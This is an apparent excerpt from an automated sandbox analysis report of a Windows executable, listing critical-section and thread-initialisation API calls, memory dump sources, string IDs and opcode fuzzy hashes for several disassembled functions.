                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$ZYA.
                      • API String ID: 2296764815-4236202813
                      • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                      • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406E39
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: ZF\K$three
                      • API String ID: 2296764815-3094064056
                      • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                      • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 049570A0
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: ZF\K$three
                      • API String ID: 4132704954-3094064056
                      • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction ID: 60cf2a7dc68a29c70edabd6d98aedb78c32db83a2db6c897080f8ef949d90416
                      • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction Fuzzy Hash: BF016974F04208EBDB20DFE9E981B4CB3B0AB54754FB041BADD15A73A0D6746A06DB19
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04957B00
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$A@K.
                      • API String ID: 4132704954-2457859030
                      • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction ID: 38221bc8e8a54746fba994961db8364b5d67c5f54a5ce43662c162bd3be8d830
                      • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction Fuzzy Hash: 320181B0F00204DFD720DFA8E946A5C77B0E749304FB001BADD16A73A0D775AA458B59
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04957C10
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$ZYA.
                      • API String ID: 4132704954-4236202813
                      • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction ID: 1213575038c523a82ef544637b8d7b5647d95631f7cf84cebd34dcb3e32a8c94
                      • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction Fuzzy Hash: CF018174F00304DFDB24EFA8E991A5C7BF0AB44314FA041BADD2557360D6757945CB49
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406C99
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: CGV.$mix
                      • API String ID: 2296764815-1644454629
                      • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                      • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04956F00
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: CGV.$mix
                      • API String ID: 4132704954-1644454629
                      • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction ID: 0ace2dae8a327e575a5f5fe3e1d4c52e27c4eb285322fb79163cc70e8265dc82
                      • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction Fuzzy Hash: 70F096B0F44204DBDB10EFA8F942E5C77E0AB45324FF00175ED06973A0D63479458B59